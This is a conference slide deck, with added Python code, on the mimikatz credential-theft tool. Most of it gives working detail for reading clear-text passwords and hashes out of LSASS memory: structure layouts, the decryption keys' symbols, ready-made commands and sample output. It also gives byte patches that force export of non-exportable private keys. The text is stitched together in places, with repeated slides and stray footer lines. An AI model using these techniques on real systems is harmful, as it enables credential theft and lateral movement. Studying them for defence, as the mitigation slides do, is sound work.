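)

_PARAM = re.compile(r'(\w+)=(?:"([^"]*)"|([^\s,]+))')


def md5_hex(text: str) -> str:
    return hashlib.md5(text.encode("utf-8")).hexdigest()


def parse_challenge(header: str) -> dict:
    """Split a 'Digest k=v, k="v"' challenge into its parameters."""
    scheme, _, params = header.partition(" ")
    if scheme.lower() != "digest":
        raise ValueError("not a Digest challenge")
    return {m.group(1): m.group(2) if m.group(2) is not None else m.group(3)
            for m in _PARAM.finditer(params)}


def ha1(username: str, realm: str, password: str) -> str:
    """HA1 = MD5(username:realm:password).  The realm is chosen by the
    server, so HA1 cannot be computed before the challenge arrives."""
    return md5_hex(f"{username}:{realm}:{password}")


def ha2(method: str, uri: str) -> str:
    """HA2 = MD5(method:digestURI) for qop=auth (auth-int would add the body hash)."""
    return md5_hex(f"{method}:{uri}")


def digest_response(ha1_hex, nonce, ha2_hex, qop=None, nc=None, cnonce=None):
    """Final response: the only password-derived input is HA1."""
    if qop:
        return md5_hex(f"{ha1_hex}:{nonce}:{nc}:{cnonce}:{qop}:{ha2_hex}")
    return md5_hex(f"{ha1_hex}:{nonce}:{ha2_hex}")      # RFC 2069 form, no qop


def _qop_of(challenge: dict):
    return "auth" if "auth" in challenge.get("qop", "").split(",") else None


def answer_challenge(header, username, password, method, uri,
                     cnonce="0a4f113b", nc="00000001"):
    """What a client (or the WDigest provider) does with a kept password."""
    ch = parse_challenge(header)
    return digest_response(ha1(username, ch["realm"], password), ch["nonce"],
                           ha2(method, uri), _qop_of(ch), nc, cnonce)


def answer_with_ha1(header, ha1_hex, method, uri, cnonce="0a4f113b", nc="00000001"):
    """Same answer from HA1 alone (pass-the-hash for one realm)."""
    ch = parse_challenge(header)
    return digest_response(ha1_hex, ch["nonce"], ha2(method, uri),
                           _qop_of(ch), nc, cnonce)
```

Because `ha1()` needs the server-supplied realm, a provider that wants to answer challenges from arbitrary servers after logon has to keep either the password or a precomputed HA1 for every realm it may ever meet; WDigest keeps the password.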
mimikatz :: sekurlsa :: wdigest - theory

This time we know:
- that WDigest keeps the password in memory "by protocol", for the HA1 digest
- that LSASS loves to unprotect passwords with LsaUnprotectMemory (so they were protected with LsaProtectMemory)

LsaUnprotectMemory
- At offset 0xb4 of LSA_SECPKG_FUNCTION_TABLE (x86 table; the listings below are from the 32-bit wdigest.dll)
- Let's search for it in WDigest:
    .text:7409D151 _DigestCalcHA1@8:        call dword ptr [eax+0B4h]
- Hypothesis seems verified

LsaProtectMemory
- At offset 0xb0 of LSA_SECPKG_FUNCTION_TABLE
- Let's search for it in WDigest:
    .text:74096C69 _SpAcceptCredentials@16: call dword ptr [eax+0B0h]
- SpAcceptCredentials receives the clear password in its arguments
  * protects it with LsaProtectMemory
  * updates or inserts data in the doubly linked list wdigest!l_LogSessList
mimikatz :: sekurlsa :: wdigest - workflow

LsaEnumerateLogonSessions -> for each LUID -> search the linked list wdigest!l_LogSessList for that LUID -> KIWI_WDIGEST_LIST_ENTRY -> LsaUnprotectMemory -> password in clear

  typedef struct _KIWI_WDIGEST_LIST_ENTRY {
      struct _KIWI_WDIGEST_LIST_ENTRY *Flink;
      struct _KIWI_WDIGEST_LIST_ENTRY *Blink;
      DWORD UsageCount;
      struct _KIWI_WDIGEST_LIST_ENTRY *This;
      LUID LocallyUniqueIdentifier;
      [...]
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING Password;
      [...]
  } KIWI_WDIGEST_LIST_ENTRY, *PKIWI_WDIGEST_LIST_ENTRY;
mimikatz :: sekurlsa :: wdigest - demo time

  sekurlsa::wdigest
mimikatz :: sekurlsa :: livessp

...because Microsoft was too good in closed networks
mimikatz :: sekurlsa :: livessp - how?

Actually, I've only used a logical (empirical) approach to search for passwords...
- Protocol reading
- Symbol searching
~ Boring ~ ... let's be more brutal this time and set a WinDbg trap:

  0: kd> !process 0 0 lsass.exe
  PROCESS 83569040  SessionId: 0  Cid: 0224    Peb: 7f43f000  ParentCid: 01b4
      DirBase: 5df58100  ObjectTable: 80ce4740  HandleCount: <Data Not Accessible>
      Image: lsass.exe
  0: kd> .process /i 83569040
  You need to continue execution (press 'g' <enter>) for the context
  to be switched. When the debugger breaks in again, you will be in
  the new process context.
  0: kd> g
  Break instruction exception - code 80000003 (first chance)
  nt!RtlpBreakWithStatusInstruction:
  814b39d0 cc              int     3
  0: kd> .reload /user
  Loading User Symbols
  0: kd> bp /p $proc lsasrv!LsaProtectMemory "kc 5; g"
  0: kd> g
mimikatz :: sekurlsa :: livessp - how?

Let's log in with a Live account on Windows 8. The trap fires (kc 5):

  lsasrv!LsaProtectMemory
  livessp!LiveMakeSupplementalCred
  livessp!LiveMakeSecPkgCredentials
  livessp!LsaApLogonUserEx2
  livessp!SpiLogonUserEx2            <- our LiveSSP provider

  lsasrv!LsaProtectMemory
  msv1_0!NlpAddPrimaryCredential
  msv1_0!SspAcceptCredentials
  msv1_0!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  tspkg!TSHidePassword
  tspkg!SpAcceptCredentials

After credential protection, LsaApLogonUserEx2 calls LiveCreateLogonSession to insert data in LiveGlobalLogonSessionList (similar to WDigest):

  1: kd> uf /c livessp!LsaApLogonUserEx2
  livessp!LsaApLogonUserEx2 (74781536)
    [...]
    livessp!LsaApLogonUserEx2+0x560 (74781a96):
      call to livessp!LiveCreateLogonSession (74784867)

Yeah, pass-the-hash capability with Live accounts too (msv1_0 stores their credentials as well)... a Live user can log on through RDP via SSO.
mimikatz :: sekurlsa :: livessp - workflow

LsaEnumerateLogonSessions -> for each LUID -> search the linked list livessp!LiveGlobalLogonSessionList for that LUID -> KIWI_LIVESSP_LIST_ENTRY -> suppCreds (KIWI_LIVESSP_PRIMARY_CREDENTIAL) -> LsaUnprotectMemory -> password in clear

  typedef struct _KIWI_LIVESSP_LIST_ENTRY {
      struct _KIWI_LIVESSP_LIST_ENTRY *Flink;
      struct _KIWI_LIVESSP_LIST_ENTRY *Blink;
      PVOID unk0;
      PVOID unk1;
      PVOID unk2;
      PVOID unk3;
      DWORD unk4;
      DWORD unk5;
      PVOID unk6;
      LUID LocallyUniqueIdentifier;
      LSA_UNICODE_STRING UserName;
      PVOID unk7;
      PKIWI_LIVESSP_PRIMARY_CREDENTIAL suppCreds;
  } KIWI_LIVESSP_LIST_ENTRY, *PKIWI_LIVESSP_LIST_ENTRY;

  typedef struct _KIWI_LIVESSP_PRIMARY_CREDENTIAL {
      DWORD isSupp;
      DWORD unk0;
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING Password;
  } KIWI_LIVESSP_PRIMARY_CREDENTIAL, *PKIWI_LIVESSP_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa

Even if we already have tools for normal accounts, aren't you curious to test one with this trap?
Me, yes!
mimikatz :: sekurlsa :: kerberos

Let's log in with a normal account. The trap fires (kc 5):

  lsasrv!LsaProtectMemory
  kerberos!KerbHideKey
  kerberos!KerbCreatePrimaryCredentials
  kerberos!KerbCreateLogonSession
  kerberos!SpAcceptCredentials         <- Kerberos ticket part? Maybe ;)

  lsasrv!LsaProtectMemory
  kerberos!KerbHidePassword
  kerberos!KerbCreateLogonSession
  kerberos!SpAcceptCredentials         <- Kerberos part for the password

  lsasrv!LsaProtectMemory
  msv1_0!NlpAddPrimaryCredential
  msv1_0!SspAcceptCredentials
  msv1_0!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  wdigest!SpAcceptCredentials

  lsasrv!LsaProtectMemory
  tspkg!TSHidePassword
  tspkg!SpAcceptCredentials

After credential protection, KerbCreateLogonSession calls:
- NT6: KerbInsertOrLocateLogonSession, to insert data in KerbGlobalLogonSessionTable
- NT5: KerbInsertLogonSession, to insert data in KerbLogonSessionList
mimikatz :: sekurlsa :: kerberos (nt6) - workflow

LsaEnumerateLogonSessions -> for each LUID -> RtlLookupElementGenericTableAvl in kerberos!KerbGlobalLogonSessionTable -> KIWI_KERBEROS_PRIMARY_CREDENTIAL -> LsaUnprotectMemory -> password in clear

  typedef struct _KIWI_KERBEROS_PRIMARY_CREDENTIAL {
      DWORD unk0;
      PVOID unk1;
      PVOID unk2;
      PVOID unk3;
  #ifdef _M_X64
      BYTE unk4[32];
  #elif defined _M_IX86
      BYTE unk4[20];
  #endif
      LUID LocallyUniqueIdentifier;
  #ifdef _M_X64
      BYTE unk5[44];
  #elif defined _M_IX86
      BYTE unk5[36];
  #endif
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING Password;
  } KIWI_KERBEROS_PRIMARY_CREDENTIAL, *PKIWI_KERBEROS_PRIMARY_CREDENTIAL;
mimikatz :: sekurlsa :: kerberos (nt5) - workflow

LsaEnumerateLogonSessions -> for each LUID -> search the linked list kerberos!KerbLogonSessionList for that LUID -> KIWI_KERBEROS_LOGON_SESSION -> LsaUnprotectMemory -> password in clear

  typedef struct _KIWI_KERBEROS_LOGON_SESSION {
      struct _KIWI_KERBEROS_LOGON_SESSION *Flink;
      struct _KIWI_KERBEROS_LOGON_SESSION *Blink;
      DWORD UsageCount;
      PVOID unk0;
      PVOID unk1;
      PVOID unk2;
      DWORD unk3;
      DWORD unk4;
      PVOID unk5;
      PVOID unk6;
      PVOID unk7;
      LUID LocallyUniqueIdentifier;
  #ifdef _M_IX86
      DWORD unk8;
  #endif
      DWORD unk9;
      DWORD unk10;
      PVOID unk11;
      DWORD unk12;
      DWORD unk13;
      PVOID unk14;
      PVOID unk15;
      PVOID unk16;
      [...]
      LSA_UNICODE_STRING UserName;
      LSA_UNICODE_STRING Domaine;
      LSA_UNICODE_STRING Password;
  } KIWI_KERBEROS_LOGON_SESSION, *PKIWI_KERBEROS_LOGON_SESSION;
mimikatz :: sekurlsa - demo time

Final sekurlsa demo:
  sekurlsa::logonPasswords full
mimikatz :: sekurlsa :: kerberos - "hu?"

OK, it works... but why?
(Not at logon at all on NT5; an unlock may be needed first.)

From my understanding of Microsoft's explanations:
- no need for passwords in the Kerberos protocol...
- everything is based on the hash (not very sexy either)

Microsoft's implementation of Kerberos is full of logic...
- For password auth:
  * the password hash is the shared secret, but the password is kept in memory anyway
- For full smartcard auth:
  * No password on the client
  * No hash on the client
  * ...except the NTLM hash on the client: the KDC sent it back as a gift (so NTLM keeps working after a smartcard logon)
mimikatz :: sekurlsa

All passwords in memory are encrypted, but in a reversible way, since they have to be used.
We used LsaUnprotectMemory in the LSASS context to decrypt them
- This function relies on LsaEncryptMemory from lsasrv.dll
For that, we previously injected a DLL (sekurlsa.dll) into the LSASS process, to benefit from its keys when we called it.

Can it be fun to decrypt outside the process?
- Yes it is... no more injection, just reading the memory of the LSASS process...
mimikatz can load lsasrv.dll too, and "imports" the keys LSASS initialized
- When we call LsaEncryptMemory in mimikatz with all the keys imported from LSASS, we get the same behaviour as when we are inside LSASS
mimikatz :: sekurlsa :: LsaEncryptMemory (NT5)

Depending on the size of the secret, LsaEncryptMemory uses:
- RC4
- DESX

Key material held by lsasrv in lsass, copied by mimikatz into its own lsasrv:
- g_cbRandomKey : DWORD (256)
- g_pRandomKey  : BYTE[g_cbRandomKey]
- g_pDESXKey    : BYTE[144]
- g_Feedback    : BYTE[8]
mimikatz :: sekurlsa :: LsaEncryptMemory (NT6)

Depending on the size of the secret, LsaEncryptMemory uses:
- 3DES
- AES

Key material held by lsasrv in lsass, copied by mimikatz:
- InitializationVector : BYTE[16]
- h3DesKey, hAesKey    : BCrypt key handles, laid out as

  typedef struct _KIWI_BCRYPT_KEY {
      DWORD size;
      DWORD type;
      PVOID unk0;
      PKIWI_BCRYPT_KEY_DATA cle;
      PVOID unk1;
  } KIWI_BCRYPT_KEY, *PKIWI_BCRYPT_KEY;

  typedef struct _KIWI_BCRYPT_KEY_DATA {
      DWORD size;
      DWORD tag;
      DWORD type;
      DWORD unk0;
      DWORD unk1;
      DWORD unk2;
      DWORD unk3;
      PVOID unk4;
      BYTE data;   /* etc. */
  } KIWI_BCRYPT_KEY_DATA, *PKIWI_BCRYPT_KEY_DATA;
mimikatz :: sekurlsa - memo

Security Packages

  Package         Symbols                                                Type
  tspkg           tspkg!TSGlobalCredTable                                RTL_AVL_TABLE
  wdigest         wdigest!l_LogSessList                                  LIST_ENTRY
  livessp         livessp!LiveGlobalLogonSessionList                     LIST_ENTRY
  kerberos (nt5)  kerberos!KerbLogonSessionList                          LIST_ENTRY
  kerberos (nt6)  kerberos!KerbGlobalLogonSessionTable                   RTL_AVL_TABLE
  msv1_0          lsasrv!LogonSessionList, lsasrv!LogonSessionListCount  LIST_ENTRY, ULONG

Protection Keys

  Key    NT 5 symbols
  RC4    lsasrv!g_cbRandomKey, lsasrv!g_pRandomKey
  DESx   lsasrv!g_pDESXKey, lsasrv!g_Feedback

  Key    NT 6 symbols
  (IV)   lsasrv!InitializationVector
  3DES   lsasrv!h3DesKey
  AES    lsasrv!hAesKey
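The LIST_ENTRY rows of the table above (wdigest, livessp, kerberos on NT5) all follow the same workflow: enumerate LUIDs, walk the package's circular doubly linked list until the entry for that LUID is found, then unprotect its Password string. Below is that walk as an added example (not mimikatz code), run on a constructed 32-bit memory image rather than on LSASS. Assumed, not from the slides: the collapsed entry layout (Flink, Blink, UsageCount, This, LUID, then UserName/Domaine/Password, the [...] members dropped), the LSA_UNICODE_STRING shape <USHORT Length, USHORT MaximumLength, PWSTR Buffer>, and a trivial XOR standing in for LsaProtectMemory/LsaUnprotectMemory.

```python
"""Find one logon session's credentials by walking an LSA package's circular
LIST_ENTRY list, as the WDigest, LiveSSP and Kerberos (NT5) workflows do.

Added example for this page, not mimikatz code.  Runs on a constructed
memory image.  Assumptions: collapsed KIWI_WDIGEST_LIST_ENTRY offsets (x86),
LSA_UNICODE_STRING = <USHORT Length, USHORT MaximumLength, PWSTR Buffer>,
and an XOR as stand-in for LsaProtectMemory / LsaUnprotectMemory."""
import struct

BASE = 0x00100000                       # virtual address of the constructed image
OFF_FLINK, OFF_LUID = 0, 16             # assumed entry offsets
OFF_USER, OFF_DOMAIN, OFF_PASS = 24, 32, 40


class Image:
    """Minimal stand-in for ReadProcessMemory over a dump."""
    def __init__(self, base, size):
        self.base, self.mem = base, bytearray(size)

    def read(self, addr, n):
        off = addr - self.base
        if not 0 <= off <= len(self.mem) - n:
            raise ValueError(f"read outside image: {addr:#x}")
        return bytes(self.mem[off:off + n])

    def write(self, addr, data):
        off = addr - self.base
        self.mem[off:off + len(data)] = data

    def read_ptr(self, addr):
        return struct.unpack("<I", self.read(addr, 4))[0]

    def read_luid(self, addr):
        return struct.unpack("<Q", self.read(addr, 8))[0]

    def read_unicode_string(self, addr):
        length, _maximum, buffer = struct.unpack("<HHI", self.read(addr, 8))
        return self.read(buffer, length)     # raw UTF-16LE, maybe still protected


def xor_protect(data, key=0x5A):
    """Stand-in for LsaProtectMemory / LsaUnprotectMemory (its own inverse)."""
    return bytes(b ^ key for b in data)


def walk_list(img, head, limit=4096):
    """Yield entry addresses following Flink until the list head comes back."""
    seen = set()
    cur = img.read_ptr(head + OFF_FLINK)
    while cur != head:
        if cur in seen or len(seen) >= limit:
            raise RuntimeError("list is corrupted or never returns to its head")
        seen.add(cur)
        yield cur
        cur = img.read_ptr(cur + OFF_FLINK)


def find_session(img, head, luid):
    """Address of the entry whose LocallyUniqueIdentifier matches, or None."""
    for entry in walk_list(img, head):
        if img.read_luid(entry + OFF_LUID) == luid:
            return entry
    return None


def credentials_for(img, head, luid, unprotect=xor_protect):
    """(user, domain, password) for a LUID; the password is unprotected last."""
    entry = find_session(img, head, luid)
    if entry is None:
        return None
    user = img.read_unicode_string(entry + OFF_USER).decode("utf-16-le")
    domain = img.read_unicode_string(entry + OFF_DOMAIN).decode("utf-16-le")
    password = unprotect(img.read_unicode_string(entry + OFF_PASS)).decode("utf-16-le")
    return user, domain, password


def build_sample_image():
    """Constructed image: list head plus two sessions (SYSTEM and an
    interactive user) and their string buffers.  Returns (image, head)."""
    img = Image(BASE, 0x1000)
    head, entries = BASE, [BASE + 0x100, BASE + 0x200]
    sessions = [(0x3E7, "SYSTEM", "NT AUTHORITY", ""),
                (234870, "Gentil Kiwi", "vm-w8-rp-x", "waza1234")]
    next_buffer = BASE + 0x800

    def put_string(slot, text, protect=False):
        nonlocal next_buffer
        data = text.encode("utf-16-le")
        data = xor_protect(data) if protect else data
        img.write(next_buffer, data)
        img.write(slot, struct.pack("<HHI", len(data), len(data), next_buffer))
        next_buffer += len(data) + 8

    ring = [head] + entries                       # circular: last.Flink -> head
    for i, addr in enumerate(ring):
        img.write(addr, struct.pack("<II", ring[(i + 1) % len(ring)], ring[i - 1]))
    for addr, (luid, user, domain, password) in zip(entries, sessions):
        img.write(addr + 8, struct.pack("<II", 1, addr))        # UsageCount, This
        img.write(addr + OFF_LUID, struct.pack("<Q", luid))
        put_string(addr + OFF_USER, user)
        put_string(addr + OFF_DOMAIN, domain)
        put_string(addr + OFF_PASS, password, protect=True)
    return img, head
```

The bounded walk with a visited set matters when reading a dump rather than a live process: a partially overwritten Flink would otherwise loop forever. Against real LSASS the offsets come from the structure definitions on the earlier slides (and differ between x86 and x64), and `unprotect` is LsaUnprotectMemory, or LsaEncryptMemory with the keys listed above.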
mimikatz :: sekurlsa - memo

Some commands:
  mimikatz privilege::debug sekurlsa::logonPasswords full exit
  psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe sekurlsa::logonPasswords full exit
  meterpreter > execute -H -c -i -m -f /pentest/passwords/mimikatz/mimikatz_x86.exe

Output (mimikatz 1.0 speaks French; labels translated here):

  mimikatz 1.0 x64 (RC)  /* Traitement du Kiwi (Aug  2 2012 01:32:28) */
  // http://blog.gentilkiwi.com/mimikatz

  mimikatz # privilege::debug
  Requesting ACTIVATION of privilege: SeDebugPrivilege: OK

  mimikatz # sekurlsa::logonPasswords full

  Authentication Id       : 0;234870
  Authentication package  : NTLM
  Primary user            : Gentil Kiwi
  Authentication domain   : vm-w8-rp-x
          msv1_0 :
                   * User      : Gentil Kiwi
                   * Domain    : vm-w8-rp-x
                   * LM hash   : d0e9aee149655a6075e4540af1f22d3b
                   * NTLM hash : cc36cf7a8514893efccd332446158b1a
          kerberos :
                   * User      : Gentil Kiwi
                   * Domain    : vm-w8-rp-x
                   * Password  : waza1234
          wdigest :
                   * User      : Gentil Kiwi
                   * Domain    : vm-w8-rp-x
                   * Password  : waza1234
          tspkg :
                   * User      : Gentil Kiwi
                   * Domain    : vm-w8-rp-x
                   * Password  : waza1234
          livessp :
                   nt (LUID KO)
mimikatz :: sekurlsa - what can we do?

Basics
- No physical access to the computer (first step to pass-the-hash, then pass-the-pass)
- No admin rights / system rights / debug privileges (...)
- Disable local admin accounts
- Strong passwords (haha, it was a joke: useless against a clear-text read)
- For privileged accounts, network logon instead of interactive (when possible)
- Audit: pass-the-hash leaves traces and can lock accounts
- No admin rights / system rights / debug privileges, even for VIPs
- Use a separate network (or forest) for privileged tasks

More in depth
- Force strong authentication (SmartCard & Token) $ €
- Short validity for Kerberos tickets
- No delegation
- Disable NTLM (available with NT6)
- Nothing exotic:
  * biometrics (it keeps the password somewhere and pushes it to Windows)
  * single sign-on
- Stop shared secrets for authentication, push public/private stuff (like keys ;))
- Leave yourself opportunities to drop backward compatibility
- Disable faulty providers
  * Is it supported by Microsoft?
  * Even if you can disable LiveSSP, TsPkg and WDigest, will you disable Kerberos and msv1_0?
mimikatz :: crypto - what is it?

A little module that I wrote to:
- play with the Windows Cryptographic API, CNG and RSA keys
- automate the export of certificates/keys
  * even those which are "not" exportable

What the crypto module can do:
- List
  * Providers
  * Stores
  * Certificates
  * Keys
- Export
  * Certificates
    - public part in DER format
    - with private keys in PFX format
  * Private keys in PVK format (it's cool, OpenSSL can deal with it too)
- Patch
  * CryptoAPI, in the mimikatz context
  * CNG, in the LSASS context (again!)

(module: mod_mimikatz_crypto)
mimikatz :: crypto - how it's protected

Private keys are DPAPI protected
- You cannot reuse private key files on another computer
  * at least not without the master keys and/or the users' passwords
A computer or a user can load their own keys because they hold enough secrets to do it (e.g. a session is opened)
- Yes, a computer/server opens a "session" too

Export/usage can be limited by:
- Password
- Popup
- Export/Archive flag not present (a constraint for most users; unavailable for computer keys)

  certutil -importpfx mycert.p12 NoExport
  certutil -csp "Microsoft Enhanced Cryptographic Provider v1.0" -importpfx mycert.p12 NoExport
mimikatz :: crypto :: capi - how it works

"Microsoft CryptoAPI provides a secure interface for the cryptographic functionality that is supplied by the installable cryptographic service provider (CSP) modules. CSPs perform all cryptographic operations and manage private keys. CSPs can be implemented in software as well as in hardware." - http://technet.microsoft.com/library/cc962093.aspx

Processes (mimikatz, IIS, Active Directory, Internet Explorer, your apps here...) load some DLLs to deal with the different cryptographic stuff: CSP (keys), smartcard reader...
- cryptdll.dll, rsaenh.dll, ...
Processes deal with cryptographic keys through this API... inside their own address space.
mimikatz :: crypto :: capi - how it's exported

[Diagram: the process asks CryptoAPI / the RSA CSP to export a key. The CSP loads the private key (DPAPI decode) and checks the Exportable flag: yes -> exported key; no -> NTE_BAD_KEY_STATE. Everything happens inside the calling process ("PLAYSKOOL").]
mimikatz :: crypto :: patchcapi - because I own my process

When we want to export a certificate with its private key (or only the key), it goes through rsaenh!CPExportKey.
This function does all the work to prepare the export, and checks whether the key is exportable:

  mimikatz # crypto::exportCertificates
  Location: 'CERT_SYSTEM_STORE_CURRENT_USER'\My
   - Benjamin Delpy
          Key container : 470ADFBA-8718-4014-B05E-B30776B75A03
          Provider      : Microsoft Enhanced Cryptographic Provider v1.0
          Type          : AT_KEYEXCHANGE
          Exportability : NO
          Key size      : 2048
          Private export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.pfx' : KO (0x8009000b) Key not valid for use in specified state.
          Public export to 'CERT_SYSTEM_STORE_CURRENT_USER_My_0_Benjamin Delpy.der' : OK

certutil says the same:

  ================ Certificate 0 ================
  Serial number: 112169417a1c3ef46a301f99385f50680fa0
  Issuer: CN=GlobalSign CodeSigning CA - G2, O=GlobalSign nv-sa, C=BE
  Subject: CN=Benjamin Delpy, C=FR
  Not a root certificate
  Cert hash (sha1): ab 9e 92 b9 43 ed 47 d9 15 bc 26 93 9e 24 a5 83 03 ac aa 7e
    Key container = 470ADFBA-8718-4014-B05E-B30776B75A03
    Provider = Microsoft Enhanced Cryptographic Provider v1.0
  Private key CANNOT be exported
  Encryption test passed
  CertUtil: -exportPFX command FAILED: 0x8009000b (-2146893813)
  CertUtil: Key not valid for use in specified state.
mimikatz :: crypto :: patchcapi - because I own my process

So what? A module in my own process tells me I can't do something? CryptoAPI is in my memory space, let's patch it!
I wrote "4" bytes in my memory space:

  before:  .text:0AC0B7CB  0F 85 33 C7 FF FF    jnz  continue_key_export_or_archive
  after:   .text:0AC0B7CB  90                   nop
           .text:0AC0B7CC  E9 33 C7 FF FF       jmp  continue_key_export_or_archive

  before:  .text:0AC1F749  0F 85 B6 3B FF FF    jnz  continue_key_export_or_archive_prepare
  after:   .text:0AC1F749  90                   nop
           .text:0AC1F74A  E9 B6 3B FF FF       jmp  continue_key_export_or_archive_prepare

At each site only 0F 85 becomes 90 E9: the 5-byte jmp starts one byte after the 6-byte jnz did, so it ends at the same address and the rel32 displacement can be reused unchanged.
mimikatz :: crypto :: patchcapi - demo time

Import, export, import as not exportable... export!
mimikatz :: crypto :: patchcapi - limitations

Because:
- I'm lazy
- in the majority of real-life cases I've seen RSA keys
  * Elliptic Curve, a little...
mimikatz crypto::patchcapi only deals with:
- Microsoft Base Cryptographic Provider v1.0
- Microsoft Enhanced Cryptographic Provider v1.0
- Microsoft Enhanced RSA and AES Cryptographic Provider
- Microsoft RSA SChannel Cryptographic Provider
- Microsoft Strong Cryptographic Provider
...all based on rsaenh.dll
mimikatz :: crypto :: cng - how it works

"Cryptography API: Next Generation (CNG) is the long-term replacement for the CryptoAPI. CNG is designed to be extensible at many levels and cryptography agnostic in behavior." - http://msdn.microsoft.com/library/windows/desktop/aa376210.aspx

"To comply with common criteria (CC) requirements, the long-lived keys must be isolated so that they are never present in the application process. CNG currently supports the storage of asymmetric private keys by using the Microsoft software KSP that is included with Windows Server 2008 and Windows Vista and installed by default."

This time, key operations are not made in the "user" process context:
the process uses RPC to call "Key isolation service" (keyiso) functions.
It seems more secure than CryptoAPI...
- It is, but it's not perfect...
mimikatz :: crypto :: cng - how it's exported

[Diagram: the process calls CNG, which forwards the export request over RPC to the KeyIso service inside the LSASS process. There the private key is loaded (DPAPI decode) and the Exportable flag checked: yes -> exported key; no -> NTE_NOT_SUPPORTED. The key never leaves LSASS, which on NT6 is a system-protected process (ML_SYSTEM, SYSTEM_MANDATORY_LABEL_NO_WRITE_UP, SYSTEM_MANDATORY_LABEL_NO_READ_UP); only the user process side is "PLAYSKOOL".]
mimikatz crypto patchcng because sometimes I own LSASS
mimikatz crypto patchcng because sometimes I own LSASS
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
When we want to export a certificate with its private key (or only the key) RPC calls lead to lsass(keyiso)ncryptSPCryptExportKey
This function do all the work to prepare the export and check if the key is exportable
07112012 07112012 Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom Benjamin DELPY `gentilkiwi` ASFWS 2012 - benjamingentilkiwicom bloggentilkiwicom 48 48
mimikatz # crypto::exportKeys
[user]
Clés CNG :
 - cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
   Exportabilité : NON
   Taille clé : 2048
   Export privé dans 'cng_user_0_cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318.pvk' : KO ; mod_cryptong::getPrivateKey / PrivateKeyBlobToPVK ; (0x80090029) L'opération demandée n'est pas prise en charge.
mimikatz :: crypto :: patchcng: because sometimes I own LSASS
This time, checks and keys are in the LSASS process… And what?
I wrote “1” byte in LSASS memory space…
.text:6C815210 75 1C    jnz short continue_key_export
.text:6C815210 EB 1C    jmp short continue_key_export
mimikatz :: crypto :: patchcng: demo time
Import, export, import as not exportable… export again.
mimikatz :: crypto :: patchcng: limitations
The patch operation needs some privileges:
– Admin (debug privilege)
– SYSTEM
mimikatz crypto::patchcng only deals with:
– Microsoft Software Key Storage Provider (maybe other algorithms than RSA?)
Not a limitation of mimikatz, but the MMC add-in for certificates cannot export CNG certificates… even those that are exportable (hu?) – certutil can…
mimikatz :: crypto :: patchcng: bonus
After one admin has patched LSASS, all users of the current system benefit from the extra exports
– until reboot / KeyIso service restart
Some other programs that don't check the export flag before asking for an export can work too
– Yeah, like the good old certutil
C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
La clé privée NE PEUT PAS être exportée
Succès du test de chiffrement
CertUtil: -exportPFX ÉCHEC de la commande : 0x8009000b (-2146893813)
CertUtil: Clé non valide pour l'utilisation dans l'état spécifié.

C:\Users\Gentil Kiwi\Desktop>certutil -user -p export_waza -privatekey -exportpfx cng_user_noexport test.pfx MY
================ Certificat 1 ================
[…]
Hach. cert. (sha1) : dc 00 c9 c7 9f 47 96 f2 8a ff 2d 0e e3 f2 97 e3 6f c2 ce 8b
  Conteneur de clé = cng_user_noexport-a3419340-5e5b-4b9a-bf08-d35d75a9b318
  Fournisseur = Microsoft Software Key Storage Provider
Succès du test de chiffrement
CertUtil: -exportPFX La commande s'est terminée correctement.
mimikatz :: crypto: memo
Some commands:
mimikatz crypto::patchcapi crypto::exportCertificates exit
psexec \\windows -s -c c:\mimikatz\Win32\mimikatz.exe crypto::patchcapi crypto::patchcng crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE crypto::exportKeys computer exit
mimikatz "crypto::exportCertificates CERT_SYSTEM_STORE_LOCAL_MACHINE Remote Desktop"
mimikatz privilege::debug crypto::patchcng crypto::patchcapi crypto::exportCertificates crypto::exportKeys exit
Password – PFX files are protected by this password: mimikatz
Keys
– When you import a certificate multiple times (exportable or not), Windows makes duplicate keys
– When you delete a certificate, Windows does not delete its private key… funny, isn't it? • So yes, mimikatz can export it
mimikatz :: crypto: what can we do?
Exactly the same as for sekurlsa: it will prevent access to accounts/computers – no admin, no admin, no admin…
Basics
– Use smartcards/tokens for users' certificates
– Use Hardware Security Modules (HSM), even SoftHSM
More in depth
– See what Microsoft can do with the TPM from Windows 8
  • Virtual SmartCard seems promising
– Verify vendors' implementation (Lenovo, Dell, …) of TPM CSP/KSP
  • Their biometrics stuff was a little buggy ;)
mimikatz: what else can it do?
Play with minesweeper
Manipulate some handles
Pass the hash
Dump SAM / AD
Stop event monitoring
Patch Terminal Server
Basic GPO bypass
Applocker / SRP bypass
Driver
– Play with tokens & privileges
– Display SSDT x86 & x64
– List minifilters actions
– List notifications (process, thread, image, registry)
– List objects hooks and procedures
– …
…
mimikatz: that's all folks
Thanks to / Merci à
– my girlfriend for her support (her LSASS crashed a few times)
– Application Security Forum for offering me this great opportunity • Partners and Sponsors, for sure
– Microsoft for always considering it as normal/acceptable
– Security friends/community for their ideas & challenges • nagual, newsoft, mubix, …
– You, for your attention
Questions?
Don't be shy ;)
especially if you have written the corresponding slide number
Blog, Source Code & Contact
blog: http://blog.gentilkiwi.com
mimikatz: http://blog.gentilkiwi.com/mimikatz
source: https://code.google.com/p/mimikatz
email: benjamin@gentilkiwi.com
mimikatz :: sekurlsa: how LSA works ( level)
